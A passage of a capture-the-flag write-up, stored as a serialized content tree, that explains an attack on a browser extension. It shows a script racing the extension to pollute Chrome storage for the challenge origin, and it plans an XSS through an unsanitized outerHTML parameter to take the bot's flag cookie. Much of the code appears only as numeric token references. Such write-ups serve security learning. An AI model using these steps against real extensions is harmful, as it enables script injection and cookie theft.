sleep",{"type":33,"tag":128,"props":19690,"children":19691},{"style":312},[19692],{"type":38,"value":5657},{"type":33,"tag":128,"props":19694,"children":19695},{"style":312},[19696],{"type":38,"value":2852},{"type":33,"tag":128,"props":19698,"children":19699},{"style":306},[19700],{"type":38,"value":19701},"ms",{"type":33,"tag":128,"props":19703,"children":19704},{"style":312},[19705],{"type":38,"value":2966},{"type":33,"tag":128,"props":19707,"children":19708},{"style":312},[19709],{"type":38,"value":5625},{"type":33,"tag":128,"props":19711,"children":19712},{"style":300},[19713],{"type":38,"value":13061},{"type":33,"tag":128,"props":19715,"children":19716},{"style":437},[19717],{"type":38,"value":13066},{"type":33,"tag":128,"props":19719,"children":19720},{"style":312},[19721],{"type":38,"value":5566},{"type":33,"tag":128,"props":19723,"children":19724},{"style":306},[19725],{"type":38,"value":13076},{"type":33,"tag":128,"props":19727,"children":19728},{"style":312},[19729],{"type":38,"value":5625},{"type":33,"tag":128,"props":19731,"children":19732},{"style":135},[19733],{"type":38,"value":19734}," 
setTimeout",{"type":33,"tag":128,"props":19736,"children":19737},{"style":312},[19738],{"type":38,"value":5566},{"type":33,"tag":128,"props":19740,"children":19741},{"style":306},[19742],{"type":38,"value":13076},{"type":33,"tag":128,"props":19744,"children":19745},{"style":312},[19746],{"type":38,"value":5584},{"type":33,"tag":128,"props":19748,"children":19749},{"style":306},[19750],{"type":38,"value":19751}," ms",{"type":33,"tag":128,"props":19753,"children":19754},{"style":312},[19755],{"type":38,"value":9722},{"type":33,"tag":128,"props":19757,"children":19758},{"class":130,"line":976},[19759,19764,19768,19772,19776],{"type":33,"tag":128,"props":19760,"children":19761},{"style":1576},[19762],{"type":38,"value":19763},"                await",{"type":33,"tag":128,"props":19765,"children":19766},{"style":135},[19767],{"type":38,"value":19688},{"type":33,"tag":128,"props":19769,"children":19770},{"style":312},[19771],{"type":38,"value":5566},{"type":33,"tag":128,"props":19773,"children":19774},{"style":523},[19775],{"type":38,"value":78},{"type":33,"tag":128,"props":19777,"children":19778},{"style":312},[19779],{"type":38,"value":5815},{"type":33,"tag":128,"props":19781,"children":19782},{"class":130,"line":988},[19783,19788,19792,19796,19800,19804,19809,19813],{"type":33,"tag":128,"props":19784,"children":19785},{"style":306},[19786],{"type":38,"value":19787},"                
document",{"type":33,"tag":128,"props":19789,"children":19790},{"style":312},[19791],{"type":38,"value":215},{"type":33,"tag":128,"props":19793,"children":19794},{"style":306},[19795],{"type":38,"value":8275},{"type":33,"tag":128,"props":19797,"children":19798},{"style":312},[19799],{"type":38,"value":5657},{"type":33,"tag":128,"props":19801,"children":19802},{"style":676},[19803],{"type":38,"value":679},{"type":33,"tag":128,"props":19805,"children":19806},{"style":140},[19807],{"type":38,"value":19808},"http://shikanoko.challenge:8547/",{"type":33,"tag":128,"props":19810,"children":19811},{"style":676},[19812],{"type":38,"value":669},{"type":33,"tag":128,"props":19814,"children":19815},{"style":312},[19816],{"type":38,"value":5676},{"type":33,"tag":128,"props":19818,"children":19819},{"class":130,"line":1001},[19820,19825,19829,19833,19837,19842,19846,19850,19854,19858],{"type":33,"tag":128,"props":19821,"children":19822},{"style":306},[19823],{"type":38,"value":19824},"                
html_elm",{"type":33,"tag":128,"props":19826,"children":19827},{"style":312},[19828],{"type":38,"value":5657},{"type":33,"tag":128,"props":19830,"children":19831},{"style":306},[19832],{"type":38,"value":7562},{"type":33,"tag":128,"props":19834,"children":19835},{"style":312},[19836],{"type":38,"value":215},{"type":33,"tag":128,"props":19838,"children":19839},{"style":135},[19840],{"type":38,"value":19841},"getElementById",{"type":33,"tag":128,"props":19843,"children":19844},{"style":312},[19845],{"type":38,"value":5566},{"type":33,"tag":128,"props":19847,"children":19848},{"style":676},[19849],{"type":38,"value":669},{"type":33,"tag":128,"props":19851,"children":19852},{"style":140},[19853],{"type":38,"value":5929},{"type":33,"tag":128,"props":19855,"children":19856},{"style":676},[19857],{"type":38,"value":669},{"type":33,"tag":128,"props":19859,"children":19860},{"style":312},[19861],{"type":38,"value":5815},{"type":33,"tag":128,"props":19863,"children":19864},{"class":130,"line":1014},[19865,19869,19873,19877,19881,19885,19889,19893],{"type":33,"tag":128,"props":19866,"children":19867},{"style":306},[19868],{"type":38,"value":19824},{"type":33,"tag":128,"props":19870,"children":19871},{"style":312},[19872],{"type":38,"value":215},{"type":33,"tag":128,"props":19874,"children":19875},{"style":306},[19876],{"type":38,"value":14160},{"type":33,"tag":128,"props":19878,"children":19879},{"style":312},[19880],{"type":38,"value":5657},{"type":33,"tag":128,"props":19882,"children":19883},{"style":676},[19884],{"type":38,"value":679},{"type":33,"tag":128,"props":19886,"children":19887},{"style":140},[19888],{"type":38,"value":19454},{"type":33,"tag":128,"props":19890,"children":19891},{"style":676},[19892],{"type":38,"value":669},{"type":33,"tag":128,"props":19894,"children":19895},{"style":312},[19896],{"type":38,"value":5676},{"type":33,"tag":128,"props":19898,"children":19899},{"class":130,"line":1026},[19900,19905,19909,19913,19917,19922,19926,19930,19934,19938],{"typ
e":33,"tag":128,"props":19901,"children":19902},{"style":300},[19903],{"type":38,"value":19904},"                let",{"type":33,"tag":128,"props":19906,"children":19907},{"style":306},[19908],{"type":38,"value":17575},{"type":33,"tag":128,"props":19910,"children":19911},{"style":312},[19912],{"type":38,"value":5657},{"type":33,"tag":128,"props":19914,"children":19915},{"style":300},[19916],{"type":38,"value":13061},{"type":33,"tag":128,"props":19918,"children":19919},{"style":135},[19920],{"type":38,"value":19921}," Event",{"type":33,"tag":128,"props":19923,"children":19924},{"style":312},[19925],{"type":38,"value":5566},{"type":33,"tag":128,"props":19927,"children":19928},{"style":676},[19929],{"type":38,"value":6040},{"type":33,"tag":128,"props":19931,"children":19932},{"style":140},[19933],{"type":38,"value":17521},{"type":33,"tag":128,"props":19935,"children":19936},{"style":676},[19937],{"type":38,"value":6040},{"type":33,"tag":128,"props":19939,"children":19940},{"style":312},[19941],{"type":38,"value":5815},{"type":33,"tag":128,"props":19943,"children":19944},{"class":130,"line":1038},[19945,19949,19953,19958,19962,19966],{"type":33,"tag":128,"props":19946,"children":19947},{"style":306},[19948],{"type":38,"value":19824},{"type":33,"tag":128,"props":19950,"children":19951},{"style":312},[19952],{"type":38,"value":215},{"type":33,"tag":128,"props":19954,"children":19955},{"style":135},[19956],{"type":38,"value":19957},"dispatchEvent",{"type":33,"tag":128,"props":19959,"children":19960},{"style":312},[19961],{"type":38,"value":5566},{"type":33,"tag":128,"props":19963,"children":19964},{"style":306},[19965],{"type":38,"value":17546},{"type":33,"tag":128,"props":19967,"children":19968},{"style":312},[19969],{"type":38,"value":5815},{"type":33,"tag":128,"props":19971,"children":19972},{"class":130,"line":1051},[19973],{"type":33,"tag":128,"props":19974,"children":19975},{"style":312},[19976],{"type":38,"value":19977},"        
})();\n",{"type":33,"tag":128,"props":19979,"children":19980},{"class":130,"line":1063},[19981,19985,19989],{"type":33,"tag":128,"props":19982,"children":19983},{"style":312},[19984],{"type":38,"value":14993},{"type":33,"tag":128,"props":19986,"children":19987},{"style":1576},[19988],{"type":38,"value":15064},{"type":33,"tag":128,"props":19990,"children":19991},{"style":312},[19992],{"type":38,"value":6097},{"type":33,"tag":128,"props":19994,"children":19995},{"class":130,"line":1076},[19996,20000,20004],{"type":33,"tag":128,"props":19997,"children":19998},{"style":312},[19999],{"type":38,"value":6190},{"type":33,"tag":128,"props":20001,"children":20002},{"style":1576},[20003],{"type":38,"value":5929},{"type":33,"tag":128,"props":20005,"children":20006},{"style":312},[20007],{"type":38,"value":6097},{"type":33,"tag":47,"props":20009,"children":20010},{},[20011,20013,20019,20021,20027],{"type":38,"value":20012},"The first part of the script performs a redirection with ",{"type":33,"tag":105,"props":20014,"children":20016},{"className":20015},[],[20017],{"type":38,"value":20018},"document.location",{"type":38,"value":20020},". This has the effect of using the challenge's origin, as the background script will be loaded and will take ",{"type":33,"tag":105,"props":20022,"children":20024},{"className":20023},[],[20025],{"type":38,"value":20026},"pendingURL",{"type":38,"value":20028}," to extract the origin.",{"type":33,"tag":47,"props":20030,"children":20031},{},[20032,20034,20040],{"type":38,"value":20033},"The second step updates the value of the page's input element and sends the change event. 
This triggers the ",{"type":33,"tag":105,"props":20035,"children":20037},{"className":20036},[],[20038],{"type":38,"value":20039},"contentScript",{"type":38,"value":20041}," event, which has the effect of updating the chrome storage linked to the origin of the pendingURL, which is the challenge's origin.",{"type":33,"tag":75,"props":20043,"children":20045},{"imgSrc":20044},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731271048/writeups/shikanoko/poc_race_localhost.webp",[],{"type":33,"tag":47,"props":20047,"children":20048},{},[20049,20051,20057,20059,20064],{"type":38,"value":20050},"Thus, from the origin ",{"type":33,"tag":105,"props":20052,"children":20054},{"className":20053},[],[20055],{"type":38,"value":20056},"localhost",{"type":38,"value":20058},", we were able to pollute the chrome cache of the origin: ",{"type":33,"tag":105,"props":20060,"children":20062},{"className":20061},[],[20063],{"type":38,"value":19446},{"type":38,"value":215},{"type":33,"tag":75,"props":20066,"children":20068},{"imgSrc":20067},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731271085/writeups/shikanoko/result_poc_race.webp",[],{"type":33,"tag":40,"props":20070,"children":20072},{"id":20071},"xss",[20073],{"type":38,"value":20074},"XSS",{"type":33,"tag":47,"props":20076,"children":20077},{},[20078],{"type":38,"value":20079},"So now we have seen that we can pollute the Chrome cache of our target. 
Now, we need to find a way to retrieve the bot's cookie that contains the flag.",{"type":33,"tag":47,"props":20081,"children":20082},{},[20083],{"type":38,"value":20084},"For this, we will examine in detail the functions that manipulate Chrome storage during the creation of an entry.",{"type":33,"tag":114,"props":20086,"children":20087},{"lang":5526},[20088],{"type":33,"tag":119,"props":20089,"children":20090},{"className":5530,"code":16378,"language":5526,"meta":8,"style":8},[20091],{"type":33,"tag":105,"props":20092,"children":20093},{"__ignoreMap":8},[20094,20117,20168,20227,20234,20353,20360,20367,20410,20561,20712,20743,20822],{"type":33,"tag":128,"props":20095,"children":20096},{"class":130,"line":131},[20097,20101,20105,20109,20113],{"type":33,"tag":128,"props":20098,"children":20099},{"style":300},[20100],{"type":38,"value":13008},{"type":33,"tag":128,"props":20102,"children":20103},{"style":135},[20104],{"type":38,"value":16394},{"type":33,"tag":128,"props":20106,"children":20107},{"style":312},[20108],{"type":38,"value":5566},{"type":33,"tag":128,"props":20110,"children":20111},{"style":306},[20112],{"type":38,"value":16154},{"type":33,"tag":128,"props":20114,"children":20115},{"style":312},[20116],{"type":38,"value":16407},{"type":33,"tag":128,"props":20118,"children":20119},{"class":130,"line":362},[20120,20124,20128,20132,20136,20140,20144,20148,20152,20156,20160,20164],{"type":33,"tag":128,"props":20121,"children":20122},{"style":1576},[20123],{"type":38,"value":16415},{"type":33,"tag":128,"props":20125,"children":20126},{"style":312},[20127],{"type":38,"value":2852},{"type":33,"tag":128,"props":20129,"children":20130},{"style":300},[20131],{"type":38,"value":16424},{"type":33,"tag":128,"props":20133,"children":20134},{"style":306},[20135],{"type":38,"value":16154},{"type":33,"tag":128,"props":20137,"children":20138},{"style":312},[20139],{"type":38,"value":215},{"type":33,"tag":128,"props":20141,"children":20142},{"style":135},[20143],{"type":38,"valu
e":6957},{"type":33,"tag":128,"props":20145,"children":20146},{"style":312},[20147],{"type":38,"value":5566},{"type":33,"tag":128,"props":20149,"children":20150},{"style":676},[20151],{"type":38,"value":6040},{"type":33,"tag":128,"props":20153,"children":20154},{"style":140},[20155],{"type":38,"value":16449},{"type":33,"tag":128,"props":20157,"children":20158},{"style":676},[20159],{"type":38,"value":6040},{"type":33,"tag":128,"props":20161,"children":20162},{"style":312},[20163],{"type":38,"value":7088},{"type":33,"tag":128,"props":20165,"children":20166},{"style":312},[20167],{"type":38,"value":762},{"type":33,"tag":128,"props":20169,"children":20170},{"class":130,"line":403},[20171,20175,20179,20183,20187,20191,20195,20199,20203,20207,20211,20215,20219,20223],{"type":33,"tag":128,"props":20172,"children":20173},{"style":306},[20174],{"type":38,"value":16469},{"type":33,"tag":128,"props":20176,"children":20177},{"style":312},[20178],{"type":38,"value":5657},{"type":33,"tag":128,"props":20180,"children":20181},{"style":306},[20182],{"type":38,"value":16478},{"type":33,"tag":128,"props":20184,"children":20185},{"style":312},[20186],{"type":38,"value":215},{"type":33,"tag":128,"props":20188,"children":20189},{"style":135},[20190],{"type":38,"value":16487},{"type":33,"tag":128,"props":20192,"children":20193},{"style":312},[20194],{"type":38,"value":5566},{"type":33,"tag":128,"props":20196,"children":20197},{"style":676},[20198],{"type":38,"value":6040},{"type":33,"tag":128,"props":20200,"children":20201},{"style":140},[20202],{"type":38,"value":6054},{"type":33,"tag":128,"props":20204,"children":20205},{"style":676},[20206],{"type":38,"value":6040},{"type":33,"tag":128,"props":20208,"children":20209},{"style":312},[20210],{"type":38,"value":5584},{"type":33,"tag":128,"props":20212,"children":20213},{"style":676},[20214],{"type":38,"value":6739},{"type":33,"tag":128,"props":20216,"children":20217},{"style":140},[20218],{"type":38,"value":16516},{"type":33,"tag":128,"pr
ops":20220,"children":20221},{"style":676},[20222],{"type":38,"value":6040},{"type":33,"tag":128,"props":20224,"children":20225},{"style":312},[20226],{"type":38,"value":5815},{"type":33,"tag":128,"props":20228,"children":20229},{"class":130,"line":739},[20230],{"type":33,"tag":128,"props":20231,"children":20232},{"style":312},[20233],{"type":38,"value":845},{"type":33,"tag":128,"props":20235,"children":20236},{"class":130,"line":765},[20237,20241,20245,20249,20253,20257,20261,20265,20269,20273,20277,20281,20285,20289,20293,20297,20301,20305,20309,20313,20317,20321,20325,20329,20333,20337,20341,20345,20349],{"type":33,"tag":128,"props":20238,"children":20239},{"style":1576},[20240],{"type":38,"value":13056},{"type":33,"tag":128,"props":20242,"children":20243},{"style":306},[20244],{"type":38,"value":16478},{"type":33,"tag":128,"props":20246,"children":20247},{"style":312},[20248],{"type":38,"value":215},{"type":33,"tag":128,"props":20250,"children":20251},{"style":135},[20252],{"type":38,"value":16487},{"type":33,"tag":128,"props":20254,"children":20255},{"style":312},[20256],{"type":38,"value":5566},{"type":33,"tag":128,"props":20258,"children":20259},{"style":676},[20260],{"type":38,"value":7367},{"type":33,"tag":128,"props":20262,"children":20263},{"style":16561},[20264],{"type":38,"value":16564},{"type":33,"tag":128,"props":20266,"children":20267},{"style":16567},[20268],{"type":38,"value":215},{"type":33,"tag":128,"props":20270,"children":20271},{"style":523},[20272],{"type":38,"value":16574},{"type":33,"tag":128,"props":20274,"children":20275},{"style":16561},[20276],{"type":38,"value":669},{"type":33,"tag":128,"props":20278,"children":20279},{"style":676},[20280],{"type":38,"value":7367},{"type":33,"tag":128,"props":20282,"children":20283},{"style":312},[20284],{"type":38,"value":5584},{"type":33,"tag":128,"props":20286,"children":20287},{"style":676},[20288],{"type":38,"value":6739},{"type":33,"tag":128,"props":20290,"children":20291},{"style":140},[20292],{
"type":38,"value":16595},{"type":33,"tag":128,"props":20294,"children":20295},{"style":676},[20296],{"type":38,"value":6040},{"type":33,"tag":128,"props":20298,"children":20299},{"style":312},[20300],{"type":38,"value":6700},{"type":33,"tag":128,"props":20302,"children":20303},{"style":135},[20304],{"type":38,"value":16487},{"type":33,"tag":128,"props":20306,"children":20307},{"style":312},[20308],{"type":38,"value":5566},{"type":33,"tag":128,"props":20310,"children":20311},{"style":676},[20312],{"type":38,"value":7367},{"type":33,"tag":128,"props":20314,"children":20315},{"style":16561},[20316],{"type":38,"value":16620},{"type":33,"tag":128,"props":20318,"children":20319},{"style":16567},[20320],{"type":38,"value":215},{"type":33,"tag":128,"props":20322,"children":20323},{"style":523},[20324],{"type":38,"value":16574},{"type":33,"tag":128,"props":20326,"children":20327},{"style":16561},[20328],{"type":38,"value":669},{"type":33,"tag":128,"props":20330,"children":20331},{"style":676},[20332],{"type":38,"value":7367},{"type":33,"tag":128,"props":20334,"children":20335},{"style":312},[20336],{"type":38,"value":5584},{"type":33,"tag":128,"props":20338,"children":20339},{"style":676},[20340],{"type":38,"value":6739},{"type":33,"tag":128,"props":20342,"children":20343},{"style":140},[20344],{"type":38,"value":16649},{"type":33,"tag":128,"props":20346,"children":20347},{"style":676},[20348],{"type":38,"value":6040},{"type":33,"tag":128,"props":20350,"children":20351},{"style":312},[20352],{"type":38,"value":5815},{"type":33,"tag":128,"props":20354,"children":20355},{"class":130,"line":804},[20356],{"type":33,"tag":128,"props":20357,"children":20358},{"style":312},[20359],{"type":38,"value":854},{"type":33,"tag":128,"props":20361,"children":20362},{"class":130,"line":839},[20363],{"type":33,"tag":128,"props":20364,"children":20365},{"emptyLinePlaceholder":896},[20366],{"type":38,"value":899},{"type":33,"tag":128,"props":20368,"children":20369},{"class":130,"line":848},[203
70,20374,20378,20382,20386,20390,20394,20398,20402,20406],{"type":33,"tag":128,"props":20371,"children":20372},{"style":300},[20373],{"type":38,"value":13008},{"type":33,"tag":128,"props":20375,"children":20376},{"style":135},[20377],{"type":38,"value":16183},{"type":33,"tag":128,"props":20379,"children":20380},{"style":312},[20381],{"type":38,"value":5566},{"type":33,"tag":128,"props":20383,"children":20384},{"style":306},[20385],{"type":38,"value":13022},{"type":33,"tag":128,"props":20387,"children":20388},{"style":312},[20389],{"type":38,"value":5584},{"type":33,"tag":128,"props":20391,"children":20392},{"style":306},[20393],{"type":38,"value":13031},{"type":33,"tag":128,"props":20395,"children":20396},{"style":312},[20397],{"type":38,"value":5584},{"type":33,"tag":128,"props":20399,"children":20400},{"style":306},[20401],{"type":38,"value":16478},{"type":33,"tag":128,"props":20403,"children":20404},{"style":312},[20405],{"type":38,"value":2966},{"type":33,"tag":128,"props":20407,"children":20408},{"style":312},[20409],{"type":38,"value":762},{"type":33,"tag":128,"props":20411,"children":20412},{"class":130,"line":976},[20413,20417,20421,20425,20429,20433,20437,20441,20445,20449,20453,20457,20461,20465,20469,20473,20477,20481,20485,20489,20493,20497,20501,20505,20509,20513,20517,20521,20525,20529,20533,20537,20541,20545,20549,20553,20557],{"type":33,"tag":128,"props":20414,"children":20415},{"style":306},[20416],{"type":38,"value":16722},{"type":33,"tag":128,"props":20418,"children":20419},{"style":312},[20420],{"type":38,"value":5657},{"type":33,"tag":128,"props":20422,"children":20423},{"style":306},[20424],{"type":38,"value":5027},{"type":33,"tag":128,"props":20426,"children":20427},{"style":312},[20428],{"type":38,"value":215},{"type":33,"tag":128,"props":20430,"children":20431},{"style":135},[20432],{"type":38,"value":16487},{"type":33,"tag":128,"props":20434,"children":20435},{"style":312},[20436],{"type":38,"value":5566},{"type":33,"tag":128,"props":20438,
"children":20439},{"style":676},[20440],{"type":38,"value":7367},{"type":33,"tag":128,"props":20442,"children":20443},{"style":16561},[20444],{"type":38,"value":5977},{"type":33,"tag":128,"props":20446,"children":20447},{"style":676},[20448],{"type":38,"value":7367},{"type":33,"tag":128,"props":20450,"children":20451},{"style":1576},[20452],{"type":38,"value":16759},{"type":33,"tag":128,"props":20454,"children":20455},{"style":312},[20456],{"type":38,"value":5584},{"type":33,"tag":128,"props":20458,"children":20459},{"style":676},[20460],{"type":38,"value":6739},{"type":33,"tag":128,"props":20462,"children":20463},{"style":140},[20464],{"type":38,"value":6351},{"type":33,"tag":128,"props":20466,"children":20467},{"style":676},[20468],{"type":38,"value":6040},{"type":33,"tag":128,"props":20470,"children":20471},{"style":312},[20472],{"type":38,"value":6700},{"type":33,"tag":128,"props":20474,"children":20475},{"style":135},[20476],{"type":38,"value":16487},{"type":33,"tag":128,"props":20478,"children":20479},{"style":312},[20480],{"type":38,"value":5566},{"type":33,"tag":128,"props":20482,"children":20483},{"style":676},[20484],{"type":38,"value":7367},{"type":33,"tag":128,"props":20486,"children":20487},{"style":16561},[20488],{"type":38,"value":6054},{"type":33,"tag":128,"props":20490,"children":20491},{"style":676},[20492],{"type":38,"value":7367},{"type":33,"tag":128,"props":20494,"children":20495},{"style":1576},[20496],{"type":38,"value":16759},{"type":33,"tag":128,"props":20498,"children":20499},{"style":312},[20500],{"type":38,"value":5584},{"type":33,"tag":128,"props":20502,"children":20503},{"style":676},[20504],{"type":38,"value":6739},{"type":33,"tag":128,"props":20506,"children":20507},{"style":140},[20508],{"type":38,"value":16816},{"type":33,"tag":128,"props":20510,"children":20511},{"style":676},[20512],{"type":38,"value":6040},{"type":33,"tag":128,"props":20514,"children":20515},{"style":312},[20516],{"type":38,"value":6700},{"type":33,"tag":128,"pro
ps":20518,"children":20519},{"style":135},[20520],{"type":38,"value":16487},{"type":33,"tag":128,"props":20522,"children":20523},{"style":312},[20524],{"type":38,"value":5566},{"type":33,"tag":128,"props":20526,"children":20527},{"style":676},[20528],{"type":38,"value":7367},{"type":33,"tag":128,"props":20530,"children":20531},{"style":16561},[20532],{"type":38,"value":669},{"type":33,"tag":128,"props":20534,"children":20535},{"style":676},[20536],{"type":38,"value":7367},{"type":33,"tag":128,"props":20538,"children":20539},{"style":1576},[20540],{"type":38,"value":16759},{"type":33,"tag":128,"props":20542,"children":20543},{"style":312},[20544],{"type":38,"value":5584},{"type":33,"tag":128,"props":20546,"children":20547},{"style":676},[20548],{"type":38,"value":6739},{"type":33,"tag":128,"props":20550,"children":20551},{"style":140},[20552],{"type":38,"value":6359},{"type":33,"tag":128,"props":20554,"children":20555},{"style":676},[20556],{"type":38,"value":6040},{"type":33,"tag":128,"props":20558,"children":20559},{"style":312},[20560],{"type":38,"value":2427},{"type":33,"tag":128,"props":20562,"children":20563},{"class":130,"line":988},[20564,20568,20572,20576,20580,20584,20588,20592,20596,20600,20604,20608,20612,20616,20620,20624,20628,20632,20636,20640,20644,20648,20652,20656,20660,20664,20668,20672,20676,20680,20684,20688,20692,20696,20700,20704,20708],{"type":33,"tag":128,"props":20565,"children":20566},{"style":306},[20567],{"type":38,"value":16876},{"type":33,"tag":128,"props":20569,"children":20570},{"style":312},[20571],{"type":38,"value":5657},{"type":33,"tag":128,"props":20573,"children":20574},{"style":306},[20575],{"type":38,"value":13031},{"type":33,"tag":128,"props":20577,"children":20578},{"style":312},[20579],{"type":38,"value":215},{"type":33,"tag":128,"props":20581,"children":20582},{"style":135},[20583],{"type":38,"value":16487},{"type":33,"tag":128,"props":20585,"children":20586},{"style":312},[20587],{"type":38,"value":5566},{"type":33,"tag":
128,"props":20589,"children":20590},{"style":676},[20591],{"type":38,"value":7367},{"type":33,"tag":128,"props":20593,"children":20594},{"style":16561},[20595],{"type":38,"value":5977},{"type":33,"tag":128,"props":20597,"children":20598},{"style":676},[20599],{"type":38,"value":7367},{"type":33,"tag":128,"props":20601,"children":20602},{"style":1576},[20603],{"type":38,"value":16759},{"type":33,"tag":128,"props":20605,"children":20606},{"style":312},[20607],{"type":38,"value":5584},{"type":33,"tag":128,"props":20609,"children":20610},{"style":676},[20611],{"type":38,"value":6739},{"type":33,"tag":128,"props":20613,"children":20614},{"style":140},[20615],{"type":38,"value":6351},{"type":33,"tag":128,"props":20617,"children":20618},{"style":676},[20619],{"type":38,"value":6040},{"type":33,"tag":128,"props":20621,"children":20622},{"style":312},[20623],{"type":38,"value":6700},{"type":33,"tag":128,"props":20625,"children":20626},{"style":135},[20627],{"type":38,"value":16487},{"type":33,"tag":128,"props":20629,"children":20630},{"style":312},[20631],{"type":38,"value":5566},{"type":33,"tag":128,"props":20633,"children":20634},{"style":676},[20635],{"type":38,"value":7367},{"type":33,"tag":128,"props":20637,"children":20638},{"style":16561},[20639],{"type":38,"value":6054},{"type":33,"tag":128,"props":20641,"children":20642},{"style":676},[20643],{"type":38,"value":7367},{"type":33,"tag":128,"props":20645,"children":20646},{"style":1576},[20647],{"type":38,"value":16759},{"type":33,"tag":128,"props":20649,"children":20650},{"style":312},[20651],{"type":38,"value":5584},{"type":33,"tag":128,"props":20653,"children":20654},{"style":676},[20655],{"type":38,"value":6739},{"type":33,"tag":128,"props":20657,"children":20658},{"style":140},[20659],{"type":38,"value":16816},{"type":33,"tag":128,"props":20661,"children":20662},{"style":676},[20663],{"type":38,"value":6040},{"type":33,"tag":128,"props":20665,"children":20666},{"style":312},[20667],{"type":38,"value":6700},{"type"
:33,"tag":128,"props":20669,"children":20670},{"style":135},[20671],{"type":38,"value":16487},{"type":33,"tag":128,"props":20673,"children":20674},{"style":312},[20675],{"type":38,"value":5566},{"type":33,"tag":128,"props":20677,"children":20678},{"style":676},[20679],{"type":38,"value":7367},{"type":33,"tag":128,"props":20681,"children":20682},{"style":16561},[20683],{"type":38,"value":669},{"type":33,"tag":128,"props":20685,"children":20686},{"style":676},[20687],{"type":38,"value":7367},{"type":33,"tag":128,"props":20689,"children":20690},{"style":1576},[20691],{"type":38,"value":16759},{"type":33,"tag":128,"props":20693,"children":20694},{"style":312},[20695],{"type":38,"value":5584},{"type":33,"tag":128,"props":20697,"children":20698},{"style":676},[20699],{"type":38,"value":6739},{"type":33,"tag":128,"props":20701,"children":20702},{"style":140},[20703],{"type":38,"value":6359},{"type":33,"tag":128,"props":20705,"children":20706},{"style":676},[20707],{"type":38,"value":6040},{"type":33,"tag":128,"props":20709,"children":20710},{"style":312},[20711],{"type":38,"value":2427},{"type":33,"tag":128,"props":20713,"children":20714},{"class":130,"line":1001},[20715,20719,20723,20727,20731,20735,20739],{"type":33,"tag":128,"props":20716,"children":20717},{"style":300},[20718],{"type":38,"value":5637},{"type":33,"tag":128,"props":20720,"children":20721},{"style":306},[20722],{"type":38,"value":17032},{"type":33,"tag":128,"props":20724,"children":20725},{"style":312},[20726],{"type":38,"value":5657},{"type":33,"tag":128,"props":20728,"children":20729},{"style":135},[20730],{"type":38,"value":16394},{"type":33,"tag":128,"props":20732,"children":20733},{"style":312},[20734],{"type":38,"value":5566},{"type":33,"tag":128,"props":20736,"children":20737},{"style":306},[20738],{"type":38,"value":16154},{"type":33,"tag":128,"props":20740,"children":20741},{"style":312},[20742],{"type":38,"value":5815},{"type":33,"tag":128,"props":20744,"children":20745},{"class":130,"line":1014
},[20746,20750,20754,20758,20762,20766,20770,20774,20778,20782,20786,20790,20794,20798,20802,20806,20810,20814,20818],{"type":33,"tag":128,"props":20747,"children":20748},{"style":1576},[20749],{"type":38,"value":13056},{"type":33,"tag":128,"props":20751,"children":20752},{"style":306},[20753],{"type":38,"value":17032},{"type":33,"tag":128,"props":20755,"children":20756},{"style":312},[20757],{"type":38,"value":215},{"type":33,"tag":128,"props":20759,"children":20760},{"style":135},[20761],{"type":38,"value":16487},{"type":33,"tag":128,"props":20763,"children":20764},{"style":312},[20765],{"type":38,"value":5566},{"type":33,"tag":128,"props":20767,"children":20768},{"style":676},[20769],{"type":38,"value":6040},{"type":33,"tag":128,"props":20771,"children":20772},{"style":140},[20773],{"type":38,"value":16355},{"type":33,"tag":128,"props":20775,"children":20776},{"style":676},[20777],{"type":38,"value":6040},{"type":33,"tag":128,"props":20779,"children":20780},{"style":312},[20781],{"type":38,"value":5584},{"type":33,"tag":128,"props":20783,"children":20784},{"style":306},[20785],{"type":38,"value":5027},{"type":33,"tag":128,"props":20787,"children":20788},{"style":312},[20789],{"type":38,"value":6700},{"type":33,"tag":128,"props":20791,"children":20792},{"style":135},[20793],{"type":38,"value":16487},{"type":33,"tag":128,"props":20795,"children":20796},{"style":312},[20797],{"type":38,"value":5566},{"type":33,"tag":128,"props":20799,"children":20800},{"style":676},[20801],{"type":38,"value":6040},{"type":33,"tag":128,"props":20803,"children":20804},{"style":140},[20805],{"type":38,"value":16362},{"type":33,"tag":128,"props":20807,"children":20808},{"style":676},[20809],{"type":38,"value":6040},{"type":33,"tag":128,"props":20811,"children":20812},{"style":312},[20813],{"type":38,"value":5584},{"type":33,"tag":128,"props":20815,"children":20816},{"style":306},[20817],{"type":38,"value":13031},{"type":33,"tag":128,"props":20819,"children":20820},{"style":312},[20821],
{"type":38,"value":5815},{"type":33,"tag":128,"props":20823,"children":20824},{"class":130,"line":1026},[20825],{"type":33,"tag":128,"props":20826,"children":20827},{"style":312},[20828],{"type":38,"value":854},{"type":33,"tag":47,"props":20830,"children":20831},{},[20832,20834,20839,20841,20846,20847,20852,20853,20858],{"type":38,"value":20833},"We can see that the call to the ",{"type":33,"tag":105,"props":20835,"children":20837},{"className":20836},[],[20838],{"type":38,"value":15555},{"type":38,"value":20840}," function sanitizes each dangerous character ",{"type":33,"tag":105,"props":20842,"children":20844},{"className":20843},[],[20845],{"type":38,"value":5977},{"type":38,"value":5584},{"type":33,"tag":105,"props":20848,"children":20850},{"className":20849},[],[20851],{"type":38,"value":6054},{"type":38,"value":6345},{"type":33,"tag":105,"props":20854,"children":20856},{"className":20855},[],[20857],{"type":38,"value":669},{"type":38,"value":20859}," with their HTML entities. This is a good practice to avoid XSS, but it is not enough.",{"type":33,"tag":47,"props":20861,"children":20862},{},[20863],{"type":38,"value":20864},"However, the last parameter is not sanitized, and it's a parameter we can control because it's directly the outerHTML that we control during the creation of an entry.",{"type":33,"tag":47,"props":20866,"children":20867},{},[20868],{"type":38,"value":20869},"And we must provide a valid input on the ?html= parameter when retrieving our input because a DOMPurify on the latest version is applied on the parameters before insertion in DOM.",{"type":33,"tag":47,"props":20871,"children":20872},{},[20873,20875,20880],{"type":38,"value":20874},"So in the ",{"type":33,"tag":105,"props":20876,"children":20878},{"className":20877},[],[20879],{"type":38,"value":16370},{"type":38,"value":20881}," function, we can see that the outerHTML is replaced with a custom template system. 
